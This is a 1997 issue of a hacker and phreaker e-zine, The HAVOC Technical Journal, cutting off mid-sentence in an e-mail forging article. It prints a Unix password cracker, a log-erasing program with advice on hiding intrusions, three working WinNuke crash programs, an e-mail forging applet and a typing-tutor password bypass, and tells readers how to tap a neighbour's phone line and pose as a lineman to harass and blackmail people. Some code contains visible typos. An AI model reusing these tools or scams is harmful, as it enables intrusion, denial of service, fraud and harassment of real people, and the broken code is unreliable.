ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³The HAVOC Technical Journal ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± Vol. 1 | No.11 | June 1st, 1997 | A HAVOC Bell Systems Publication HAPPY ANIVERSARY TO THTJ! 1 YEAR AND GOING STRONG! WOO HOO! _____________________________________________________________________________ -[The HAVOC Technical Journal Issue 11]- Editorial..............................Scud-O crack-passwd.c ........................Scud-O Getting away scott free................The Banshee Winnuke Info & Code....................Snapple REality's Digital Dictionary...........REality Generate.pas ..........................Scud-O Back Door to MicroType.................WeatherM Mobile Phreaking.......................phear. Java Mail Forging & Bombing............Scud-O Line Man Impersonation.................phear. Securities Hole in cgi-bin.............memor The History of Caffeine................Scud-O Untitled...............................It's a secret Looking Back, a year later.............Scud-O The News...............................KungFuFox Phonecalls.............................THTJ ------------------------------------------------- [WE HAVE MOVED] Hell, most of you probably already know this, but thanks to JP we are now at: http://www.antionline.com/hbs/ [ArcAngl Joins HBS] Yes, yet another #phreak brother has joined up with HBS. Arc is one cool mofo, and let knows his shit. He lives kinda near Scud-O, so watch for halarious anidotes coming from their stories of trashing, getting busted, drinking, fast driving, etc. Note: Watch out for Acura Integras and Poniac Grand Prix LE's drag racing! _____________________________________________________________ [ Soul Coughing FUCKING OWNS! ] Well, at the HFStival in RFK Staduim in Washington DC took place on May 31st, and i would like to thank Sould Coughing for letting me hang with them. YOU GUYS FUCKING OWN! If you have never heard any of Soul Coughing's music, go run ( not walk ) to a store and buy "Irresistible Bliss" their newest CD, or pick up some of the older CDs. Also, if you have the X-Files CD Soundtrack, pop it in and play sone number 2, 'Unmarked Helicopters' and hear Soul Coughing's wonderful music. _____________________________________________________________ The HAVOC Technical Journal - Information - Editor in Chief : Scud-O, FoxMulder@worldnet.att.net - Assitant Editor : KungFuFox, mazer@cycat.com - Submissions Editor: Keystroke, keystroke@thepentagon.com - THTJ email address: thtj@juno.com - THTJ website: http://www.antionline.com/hbs/ - THTJ mailing address: PO BOX 448 Sykesville, MD 21784 The HAVOC Technical Journal Vol. 1, No.11, June 1st, 1997. A HAVOC Bell Systems Publication. Contents Copyright (©) 1997 HAVOC Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [No copying THTJ, damnit.] The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.] For infomation about using articles published in THTJ, send mail to: e-mail: thtj@juno.com mail: THTJ c/o HBS PO Box 448 Sykesville, MD 21784 _____________________________________________________________ [Editorial : by Scud-O] Money.......... Money, get away Get a good job with more pay and you're O.K. Money it's a gas Grab that cash with both hands and make a stash New car, caviar, four star daydream, Think I'll buy me a football team Money get back I'm alright Jack keep your hands off my stack. Money it's a hit Don't give me that do goody good bullshit I'm in the hi-fidelity first class travelling set And I think I need a Lear jet Money it's a crime Share is fairly, but don't take a slice of my pie Money so they say Is the root of all evil today But if you ask for a rise it's no surprise that they're giving none away. - 'Money' by Pink Floyd from 'Dark Side of the Moon' Lyrics by Roger Waters. This month, i am going to have a little chat with you on money. Why you ask? Well, let me blurt it out. Earlier this month, while checking my mail at the local Post Office, i was approached, and offered a buy out bid for The HAVOC Technical Journal. Yes, thats right, some one wanted to buy this very zine that you are reading. Shocked? Well, so was I, especially when i read the 'contract'. The 'Contract' -------------- Ok, the person who approached me and offered me this money, the amount of which ill get to in a minute, gave me this contract before heading out the door. It states that one, Scud-O aka __(My REAL Name would go here)___ is to be paid $10,000 for The HAVOC Technical Journal, Any and all copyrights held for THTJ, And my current computer. Ok, now that sounds like a good deal but read on.... The restrictions on the editor and writing staff were as follows: o I ( Scud-O) can never write or edit another zine, either in print, or online, and is far as the rest of this document explained, It looked like i could never work and a h/p zine, or even a NORMAL zine like Time, Newsweek, etc. o Any and all past writers can never write for another zine, either in print or online. Now, this is just simply unenforcible, as i have no control over the other writers. They will still continue to write articles for many zines. I think this was added, so if i had volated the contract that they could sue me, and at least be gareented the 10000 they paid me. So, after reading this, well i threw out the contract. There is no way that i am going to give up THTJ or my freedom to edit a zine, or even write articles for them. Maybe some of you are saying, 'hey just use a different nick' , well this would not work, since if the traced the zine to me, which probably wouldnt be hard to do, They could sue me for breach of contract, and sue my ass off. In the end, i hope you liked the view i took, and decided to keep THTJ. Scud-O , Founder, and Editor in Chief of THTJ Scud-O and HBS would like to hear your views on this issue. Please feel free to e-mail us at: FoxMulder@worldnet.att.net ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of HAVOC Bell Systems- FoxMulder@worldnet.att.net | http://www.antionline.com/hbs/ _____________________________________________________________ [ No We are NOT Going to Stop ] Earlier this month, I had mentioned to a few people that i was thinking of giving up thtj. Well, this is false. I had looked into giving up on the h/p scene in general, but after a few beers, i changed my mind, I am going to keep this zine going. I would like to thank JP for telling people that i was thinking of giving up and stop publishing thtj. And a REAL big thanks to the hundreds of you who sent me e-mail saying to keep up the good work on the zine. Thanks. _____________________________________________________________ [ crack-passwd.c - A Password Cracker by Scud-O] Ok, well, why this may not be the greatest cracker out there, this has a variety of features, and does more cracking than other conventional password crackers out there. This is for the UNIX platform, and i have no intention of porting it to DOS, since well, i dont feel like porting crypt() along with it. /******************************************************************* * * crack-passwd.c - A Password Cracker by Scud-O for THTJ11. * * Usage: crack-passwd [-w wordlist] * * This is a fairly advanced cracker, first it gets the GECOS field, and * modifies it, etc and trys it as the password. if this fails, then it goes * to the wordlist that you specify, or the /usr/dict/words if you leave it * blank. * * All comments to: Scud-O at * * Improvements needed : a faster crypt() method would be nice, maybe ill * try crypt(3), hmmmm. also a faster try() would be nice. * Also: adding the joetest.c code could be nice, but it's not needed. *********************************************************************/ #include #include #include #include #include #define DEF_WORDLIST "/usr/dict/words" #define MAXWORDS 32767 #define NW 64 int ndictwords = 0; char *pname; char *wordfile = DEF_WORDLIST; char wordlist[MAXWORDS][9]; main(argc, argv) { char **argv; int argc; { char * try(); register chat *passwd; register struct passwd *pw; setlinebuf(stdout); pname = *argv; /* Process the arguments */ while (--argc) { if ( **++argv != '-') /* Yuck, a goto! i should change this.... */ goto usage; switch ( *++*argv) { case 'w': if (--argc <= 0) /* Again! */ goto usage; wordfle = *++argv; break; default: usage: fprintf(stderr, "Usage: %s [-w wordfile\n", pname); exit(1); } } /* load up the wordlist */ load_wordlist(); /* For each password file line..... */ while((pw = getpwant()) != NULL) { /* Look at the excrypted password. If it's not 13 characters, * the password is a fake value. ( or its, yuck encrypted) */ switch (strlen(pw->pw_passwd)) { case 13: /* Crack the biatch */ if (( passwd = try(pw)) != NULL) { printf("%s was cracked, password is %s\n", pw->pw_name, passwd); } break; case 0: /* Error, an invalid password */ printf("Error - a zero length password : %s\n", pw->pw_name); break; default: break; } } exit(0); } /**************************************** * try() - this function does the cracking ****************************************/ char *try(pw) struct passwd *pw; { char *crypt(); char *words[NW]; register char *s; static char buf[1024]; register int i, nwords; /* Build a list of words - the login name, and words from GECOS */ words[0] = pw->pw_name; nwords = 1; s = pw->pw_gecos; while (*s == ' ' || *s == '\t') s++; while (*s != ',' && *s != '\0' && nwords < NW) { while (*s == ' ' || *s == '\t') *s++ = '\0'; words[nwords++] = s; while ( *s != ' ' && *s != '\t' && *s != ',' && *s != '\0') s++; } *s = '\0'; /* Ok, now lets try all those words in various permutations. */ for (1 = 0; 9 < nwords; i++) { if (!strcmp(pw->pw_passwd, crypt(words[i], pw->pw_passwd))) return(words[i]); reverse(words[i], buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); lower(words[i], buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); upper(words[i], buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); capital(words[i], buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd))) return(buf); } /* Ok, that didn't work, lets try the dictionary */ for ( i=0; 1 < ndcitwords; i++) { if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(wordlist[i]); reverse(wordlist[i], buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); lower(wordlist[i], buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); upper(wordlist[i], buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); capital(wordlist[i], buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); reverse(buf, buf); if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd))) return(buf); } return(NULL); } /* load_wordlist() - read the wordlist into memory. Pretty simple */ load_wordlist() { FILE *fp; char word[BUFSIZ]; if ((fp = fopen(wordfile, "r")) == NULL) { fprintf(stderr, "%s: cannot open %s.\n", pname, wordlist); exit(1); } while(ndictwords < MAXWORDS && fgets(word, BUFSIZ, fp) != NULL) { word[strlen(word)-1] = '\0'; /* strip the newline character */ strncpy(wordlist[ndictwords], word, 8); wordlist[ndictwords++][8] = '\0'; } fclose(fp); } /* lower() - convert (s) to lower case (t) */ lower(s,t) register char *s, *t; { while(*s) { *t++ = isupper(*s) ? tolower(*s) : *s; s++; } } /* upper() - convert (s) to upper case (t) */ upper(s,t) register char *s, *t; { while(*s) { *t++ = islower(*s) ? toupper(*s) : *s; s++; } } /* capital() - capitalize (s) and store it (t) */ captial(s,t) register char *s, *t; { *t++ = islower(*s) ? toupper(*s) : *s; s++; while(*s) { *t++ = islower(*s) ? toupper(*s) : *s; s++; } } /* reverse() - reverse (s) and store it (t) */ reverse(s, t) register chat *s, *t; { register char *p; p = &s[strlen(s) - 1]; while ( p >= s) *t++ = *p--; *t = '\0'; } _____________________________________________________________ ************************* | If you dont like it then eat me cuz its free Getting away scott free. | information and you should be trying to get by The Banshee | as much as that as you can before we all This was written for THTJ | blow up and die a terrible horrible death cuz the zine is the bomb | cuz big brother is watching.. ************************* | BE PARANOID! Everyday you see some dumbass wanna be hacker getting arrested, suspended from school, kicked out of the house, getting raided by the feds for the stupid ass reason that the dumb fucker doesnt know how to edit log files! In this text I am going to explain the varius log files, and where to find them and how to edit and replace them, using either your greatest hacking tool yet, that being pico, or use one of the log editor programs. In this day in age, people use the internet as good ways to access other computers. Good idea, but you are also more succeptible to log files. When you gain root on a dial up there are no log files to be dealt with. The only true worry is that someone will trace your number back to the original caller. but that is easily by passed by simply not doing it from your house. Here is a simple plan for using your neibors phone line to do your deeds (I am lucky for I have a kid next door who tells everyone hes a hacker so if I ever get caught its him who gets the blame). Ok here we go, on most rural or suburban neiborhood there are little gray boxes on the sides of the houses, which are locked by a simple screw that you can unscrew in a matter of seconds. This little gray box contains usually two phone lines that lead up into the house. If the person has two phone lines then the two jacks will be two different lines, if they have one phoneline then both jacks will be the same line. Ok, if the person has only one phone line you are good to go. (Make sure you do this at night or when your neigbors are away on vacation) Dig a small ditch from your neigbors gray box to your house's nearest window, then get some long phone cords (Usually found at radio shack) and run it from the gray box to your nearest phone in your house. Cover up the ditch and you got yourself a nice phone line to do what you like. But what if the house has two phonelines and you cant dissconnect one of thier lines just for you to use, you may ask. That is right thats just screamin for yourself to get caught, so heres what you do! Go to radio shack and pick up a splitter they kinda look like this || --- / \ |_____| I know thats a real lame depiction of the splitter itsself, but uhm what it does is you can split one line into two lines. So do the same as the one liner and dig a ditch etc etc, but put the splitter in and lead one line into your neibors house and the other to your house, so no suspision when they use their second phone line and the have no dial tone..Also I suggest you do all your callin on their phone line when they are not home, and dont try to listen in on their phone calls cuz each time you pick up the phone thers a really loud click that the other party can hear..Use it just for doing the stuff you wouldnt dare using your phone line to do. So when the cops start pullin up, you dont have to worry its all next door. Now on too unix, and linux. When you do anything on a linux server, you are logged. The three main log files you really should worry about are 'lastlog', 'UTMP', and 'WTMP' The only way to edit these files is if you have root cuz only root owns these files. Heres a breif description of the 3 important log files. LastLog - Where the last login came from. WTMP - every log on and off, with login and logout time plus tty and host. UTMP - Who is currently logged in on the server. Heres where they can be found on vairus operating sytems. Usually in linux you can find all the log files in /usr/var/adm LastLog UTMP WTMP | If one of them is in one of those ------- ------ ------ | directorys, all the rest tend to be in /usr/var/adm /etc /etc | the same direcorys. And dont forget /usr/adm /var/adm /var/adm | if you used the famed phf exploit /var/adm /usr/var /usr/var | to get your password file that you /var/log /usr/adm /usr/adm | cracked, dont forget to erase everything /var/log /var/log | in the /httpd/logs file, in which a lot | of hackers neglect to do! Things not to do ---------------- Never, ever, ever, ever totally delete the log files for the fact that root then knows that there was a hacker in the mists of his system. Dont go into /etc/motd and change the motd. Thats the first thing most lame fuckers do, and thats just another way of screaming 'A HACKER WAS HERE!' (Why is it when someone acctually gets into a system they feel compled to tell someone that they were there?) Dont put in suid root shells anywhere, your better off compiling a backdoor so you can access it anytime without being noticed by commands like user or finger.. Dont hack the webpage the server is using, unless you have a pretty damn good reason to do it and not just to show off to your friends and to try to be cool Some codes to help you along the way ------------------------------------ Marry.c is a great program for editing log files. Lots of flags to play with and over all its a great fucking program to use to edit and spoof logs. You can get the source redily at most sites that offer "hacking" codes. Im sure alot of people can back me up in saying this is one of the best. (http://www.rootshell.com is one of the places you can get it) This next program basicly just erases yourself from all the logs, its simple but it also screams to the sysadmin that there was a hacker present in the machine #include #include #include #include #include main(argc, argv) int argc; char *argv[]; { char *name; struct utmp u; struct lastlog l; int fd; int i = 0; int done = 0; int size; if (argc != 1) { if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) { printf("You are now cloaked\n"); goto start; } else { printf("close successful\n"); exit(0); } } else { printf("usage: close [file to close]\n"); exit(1); } start: name = (char *)(ttyname(0)+5); size = sizeof(struct utmp); fd = open("/etc/utmp", O_RDWR); if (fd < 0) perror("/etc/utmp"); else { while ((read(fd, &u, size) == size) && !done) { if (!strcmp(u.ut_line, name)) { done = 1; memset(&u, 0, size); lseek(fd, -1*size, SEEK_CUR); write(fd, &u, size); close(fd); } } } size = sizeof(struct lastlog); fd = open("/var/adm/lastlog", O_RDWR); if (fd < 0) perror("/var/adm/lastlog"); else { lseek(fd, size*getuid(), SEEK_SET); read(fd, &l, size); l.ll_time = 0; strncpy(l.ll_line, "ttyq2 ", 5); gethostname(l.ll_host, 16); lseek(fd, size*getuid(), SEEK_SET); close(fd); } } Now as a concluding paragraph Ive decided to show you why you should be paranoid as shit. The first and only time I was busted wasnt because I neglected to erase log files, or I told eveyone about my doings, it was because there was a large suspision that I was an alleged "hacker". So because of this I was not only kicked out of college, I also found out that I was being watched for 3 weeks including undercover bitches posing as my classmates to try to rip out info on me..You can call this discrimination, biased thoughts, or whatever you want, but the fact is, no one even likes the term hacker, the simple word brings up thoughts of some punk teen giving other people virus's. Much like marijuana legalazation, gay rights, abortion, racisim, hacking is a very very touchy subject that our governmetn likes to brush under the carpet and try to just forget it. But its there, and the hackers like codezero (hacking amnesty international) are giving the real hackers a bad name, givin the term hacker even more of a discriminitory meaning..What Im trying to say here is, be paranoid, dont talk shit, and look after your own ass. _____________________________________________________________ Editor's note: Well it seems that some people to read directions and send in their articles to our submissions editor, keystroke. Thanks to key for passing this along and to Snapple for writing it. This is a popular topic these days, so have fun using the code you all. WinNuke Pack 1.0 by Snapple(root@techie.com) ============================================ Another sloppy piece of Microsoft coding. It is possible to remotly cause denial of service to any of the operating systems listed below. by sending Out of Bounds data to NetBios, port 139.The users carrier will drop and cause Windows to execute a general protection fault (crash). Obviously you will need an ip address and the target machine will also need an ip address(ie: inet connection). Systems that are affected are: - Windows 3.11 - Windows 95 - Windows NT 3.51 - Windows NT 4.0 What the pack contains ====================== - winnuke ansi c source code (linux, bsd, sunos)* - perl script version of winnuke.* - Visual C++ version of winnuke (MsWindows platforms).* - Win95 winnuke binary(winnu95.zip). - Mac winnuke source (winnuke-10-source.hqx). - Mac winnuke binary. (WinNuke_1_0_FAT.sit). * code inserted into article below. Some Final Words ================ "Download and apply the patches and perhaps you're safe for the next few weeks. That is, untill the next Microsoft bug surfaces.... This will go on forever. Are you getting sick and tired of this? Are you fed up with giving your money to Bill Gates - already the richest man in the world - and getting all this crap in return? Then perhaps you're ready for an alternative. Perhaps you're ready for Linux. Linux is an exciting and powerfull operating system with millions of happy users world wide. It's the fastest growing operating system in existence. The brightest minds of the computing world contribute to it. They don't do it for money, they do it because they want the best system possible. " (quoted) Snapple.(root@techie.com) ========================= Ansi C code. ( by _eci) ======================= --- CUT HERE --- /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */ #include #include #include #include #include #include #include #define dport 139 /* Attack port: 139 is what we want */ int x, s; char *str = "Bye"; /* Makes no diff */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s \n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash... "); send(s,str,strlen(str),MSG_OOB); usleep(100000); printf("Done!\n"); close(s); } --- CUT HERE --- Perl script Winnuke (by Ghent) ======================== --- CUT HERE --- #!/usr/bin/perl # Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; --- CUT HERE --- Windows Nt/95 winnuke source (by Eugene Surovegin) ========================================== --- CUT HERE --- // Windows NT port by Eugene Surovegin // Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2 #include #include #include #include #define dport 139 /* Attack port: 139 is what we want */ int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; int res; memset((char *)&blah,0,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); else if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) { puts("Cannot resolve host"); return(-3); } if (res=connect(sock,(struct sockaddr *)&blah,16)==-1) { puts("Cannot connect socket"); return(-4); } printf("Connected to [%s:%d].\n",server,port); return 0; } void main(int argc, char *argv[]) { int s; char *str = "Bye"; /* Makes no diff */ int port=0; if ( (argc<2) || (argc>3)) { printf("Usage: %s []>\n",argv[0]); exit(0); } if (argc==3) port=atoi(argv[2]); if (!port) port=dport; WSADATA wsaData; if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){ if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) { if (!open_sock(s,argv[1],port)){ puts("Sending crash... "); send(s,str,strlen(str),MSG_OOB); puts("Done!"); } else printf("Error connecting to host %s",argv[1]); closesocket(s); } else puts("Error getting socket"); WSACleanup(); } else puts("Cannot init Winsock"); } --- CUT HERE --- _____________________________________________________________ --=[ REality's Digital Dictionary ]=-- Written by REality REF. Racal-DataCOM (elseberry@usa.net) (Block) A quantity of information transmitted as a discrete entity by its own starting and ending points, usually with its own control, routing, and error correcting information. (BMS) (Bandwidth Management Service) An option availible with Accunet T1.5 service from my friend and yours AT&T to enable customers to use an on-premises terminal to reconfigure channels within their T1 trunkz in as little as one minute preventing the hassle of waiting on tech for 25 fucking years. (BOC) (Bell Operating Company) Any of the 22 local telephone companies divested from AT&T and reorganized into the seven regional Bell Holding Companies. Examples include Bellsouth, Bell Atlantic, Southwestern Bell, blah. (BPS) (Bits per second) A measure of speed in serial transmission. Also used to describe hardware capabilities. Examples of this shit include a USR 56KBps modem. (Bridge) A device that connects two LANs. Bridges function at the data link layer of the OSI model, and provide protocol-independent forwarding data between two totally fucking different networks. (Broadcast) The delivery of a transmission for two or more stations at the same time, such as over a bus-type local area network or for rich fuckers, by satelitte. (Brouter) (WooHoo!) A device that combines the functions of a bringe and a router. Can route one or more protocols, such as TCP/IP and XNS, and bridge all other traffic over to the local network. Otherwords, a brouter is tha' shit. (Bypass) Any private networking scheme that accesses long-distance transmission facialities without going through the local exahcnge carrier. (Byte) A computer-readable group of bits (normally 8 bits in length). (Byte Stuffing) The insertion of specific bytes of information into a stream of data to act as control characters for that certain stream of data. _____________________________________________________________ [ Generate.pas ] by Scud-O {$N+,E+} PROGRAM Generate; (*************************************************) (* Generate 1 - A program to be used to generate *) (* wordlists for password cracking. Uses *) (* factorials and permutations to generate it *) (* *) (* See below on how to enlarge the list, etc. *) (*************************************************) TYPE PermString = String[13]; FUNCTION Factorial(B : Byte) : Extended; VAR T : Extended; N : Byte; BEGIN T := 1; FOR N := 1 TO B DO T := T*N; Factorial := T; END; PROCEDURE Xchg( VAR A, B : Char); VAR T : Char; BEGIN T := A; A := B; B := T; END; FUNCTION PermOf(Org : Permstring; L : LongInt) : PermString; VAR P, Q : Byte; Nump : LongInt; BEGIN PermOf := ''; IF L < 1 THEN Exit; Nump := Round(Factorial(Length(Org))); IF L > Nump THEN Exit; Dec(L); P := 0; FOR Q :=Length(Org) DOWNTO 2 DO BEGIN Inc(P); Nump := Nump DIV Q; Xchg(Org[P] , Org[P + (L DIV Nump)]); L := L MOD Nump; END; PermOf := Org; END; VAR N : LongInt; Wordfile : Text; BEGIN Assign( Wordfile, 'wordfile'); Append(Wordfile); (****************************************************************** * Ok, to make this bigger and have a larger word file, first, * Enlarger the number in the Round(Factorial(X)) and then where * PermOf('letters') replace that with the letters you want to use * I used append() so that you can keep buiding the list. have fun *******************************************************************) FOR N := 1 TO Round(Factorial(7)) DO WriteLn(Wordfile, PermOf('abcdefg', N):5); Close(Wordfile); END. _____________________________________________________________ The Weather Report: Back Door to MicroType By: WeatherMan MicroType is alittle typing tutor designed for teaching in the classroom. I think its real pathetic because they make it so you can't certain things you want it to do. This my help you in your journeys. First goto the \mt directory. Second find a file called m.xxx xxx=bat or exe I don't really remember. Third run it and it should give you a password prompt. Fourth put in "010" and It will ask you if you want to change the password or not. whuala, amaze your friends and give me credit. Contact Info: weatherm@surfsouth.com www.surfsouth.com/~weatherm UIN Number: 1209195 _____________________________________________________________ [ Linemen Scams ] by phear. Well fuck, here we go. Special thanks to whoever feels like publishing this. After all without information we are all truly lost. Ever been out beige boxing and thought to yourself, "self, this rules but there has to be more".. almost as if something was missing? Well ill tell ya, its not an overwhelming urge to accept the lord as your saviour. (so maybe im a little bitter) I was out just doing the usual beigeboxing the other night and I thought to myself. "Why should I be forced to this in the dark at night in fear of being caught?" And thats when i realized i dont have too, in fact neither do you. What better scam then to pretend your a lineman. Hopefully if your beigeboxing you know know enough about phones to be a lineman if not you could wing it if you had too. So here's what you do. Go buy a white hardhat. Any white hardhat will do, just as long as it fits right, I mean why be uncomfortable in the midst of phreaking? Then rummage through your closet ( I know, I know, I would'nt want to go in there either ) until you find a longsleeve light blue shirt. Grab a pair of jeans too. Alright now, put it all on and look in the mirror. Believe it or not you will look a whole hell of a lot like a lineman. Or atleast enough for the general public to be fooled. Now what your missing are tools. No lineman's outfit is complete without tools. A utility belt isnt a bad idea but not a necessity, I've never used one. You need a red phone, baseless of course. Preferrably a lineman's handset, but those aren't always just readily available. If you want one bad enough though just swipe one out of a Bell truck. The important thing is that whatever phone you have, it's red. Remember were fooling the general public here. You also have got to have a 7/16" hex driver, preferabbly with a red handle but beggars cant be choosers. Hell when you swipe the phone just swipe the hex driver too. In fact if you can, take the whole tool belt. You also need a small flashlight, poor lighting or something, you never know. Alright, you've got the outfit, tools, and a need to phreak. Where to phreak at though? I mean you dont have a big white truck with all sorts of compartments in it to make you totally legit. So you have to maintain a low profile. Always pick a spot and then park a block from it and walk there. Starting off you should hit a few houses. Places where nobody's home, at work or something. Just walk up there and open up the phonebox, act like you belong there. I gaurantee no one will even question you for a minute. After you feel pretty confident move on to bigger and better phreaks. Go hit a local buisness or two, but go inside and tell them that you were sent from their phone company, whatever it is and that you are doing a routine check on the lines because there's been some trouble a few lines down etcetera.. Then go find the box, if you want, ask them to show you the phone setup in the building. This is the best way to get confident about a scam like this. Check it all out, pump them for information. Then go back to the box and make a few free calls. If your going to go this far though you should probably have a lineman's handset. Looks a lot more professional. Then move on to large apartment complexes. These are especially nice because the lines are always grouped together. Atleast four in each box. So now you have your method down and you feel pretty confident. What can you really do with these new amazing lineman's powers? Well you know that jerk your always pranking? Now you can go to his house and fuck his shit up in broad daylight. In fact go to the door and talk to him about his phone service for a minute or two. Ask him if he's been having trouble with the lines, so on so forth. Ask him if he minds if you come in for a minute and have a look at the phone lines in the house. Walk around and pay attention. You never know what youll see, potential black mail info, or maybe a bill with his ss# on it. Then explain to him that due to maintenance purposes your going to have to disconnect his line for an hour or so. Then go out to his phone box and do just that. Then go back up to the house and tell him that you have an emergency and have to go, but you'll be back in just a few minutes. Leave. Gee, did i forget to hook your shit back up? Now the next time you call him you can tell him exactly what he looks like and what his house looks like. He would probably never suspect the lineman. This would probably be the point where you're wondering if this is all just bullshit or not. Well, I'll tell ya. Or not. I have done this and it works. Just maintain a very cool composure. Never act nervous or let the "victim" think you are unsure of yourself. Never go out any later than 4:00 or so, and don't stay in any one place for more than 20 minutes. One more cardinal rule, if you see a real lineman, or a phonetruck, get the fuck out of there. As much as I hate to think about it, impersonating a lineman is a crime, and so is phone fraud so don't hang around. The linemen will know a fake when they see one. That's it. The lineman's scam can be pulled off by anyone, but don't ever forget that it is a scam, and should be done cautiously. So if your just tired of the same old beigebox routine and need a change of pace, just say fuck it. Go be a lineman, you'll thank yourself. phear _____________________________________________________________ [ Java Mail Forging, Bombing, and Other Aspects ] by Scud-O Ok, we all know how easy it is to 'forge' e-mail on the internet. just telnet in to port 25 and use the sendmail commands like MAIL FROM: , RCPT TO: , DATA, QUIT, etc to 'forge' mail from a server. Of course, this is not really forged mail, since your domain is still shown in the header for the mail, but since most people these days use either Netscape mail, or Eudora, which only display the short little header, many people may think that a mail from thepope@vaticancity.va could be real. Well, actually if you thought it was real youd have to be real dumb or real drunk. PopeMail.Java - [ Java Mail Forging ] --------------- import java.applet.*; import java.io.*; import java.net.*; public class PopeMail extends java.applet.Applet implements Runnable { public static Socket socker; public static DataInputStream inner; public static PrintStream outer; public static int mailPort = 25 ; public static String mailFromPope = "vaticalcity.va"; public static String toLammah = "lammah@lameville.net"; // Change this! public static String starter = new String(); Thread controller = null; public void init() { try { socker = new Socket(getDocumentBase().getHost(), mailPort); inner = new DataInputStream(socker.getInputStream()); outer = new PrintStream(socker.getOutputStream()); } catch (IOException ioe) {} } public void start() { if (controller == null) { controller = new Thread(this); controller.setPriority(Thread.MAX_PRIORITY); controller.start(); } } public void stop() { if (controller != null) { controller.stop(); controller = null; } } public void run() { try { starter = inner.readLine(); } catch (IOException ioe) {} SendMail("HELO " + mailFromPope); SendMail("MAIL FROM: " + "thePope@" + mailFromPope); SendMail("RCPT TO: " + toLammah); SendMail("DATA"); SendMail("Subject: Your Sainthood" + "\n" +"Greeting O Holy one," + "\n" + "\n" + "I have decided to claim you Saint Lammah for your dedication\n" + "at being lame. Thank you for your hard work. Countless\n" + "generations will smile upon your holy name for your hard\n" + "work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" + "\n" + " The Pope, John Paul II\n" + " thepope@vaticancity.va \n" + "\n"); SendMail("QUIT"); try { socker.close(); } catch (IOException ioe) {} } public void SendMail(String toSend) { String response = new String(); try { outer.println(toSend); outer.flush(); response = inner.readLine(); } catch(IOException e) {} } } The applet is very simple in its conception and operation. The init() method creates a socket to communicate with port 25 on the applet's home host, a 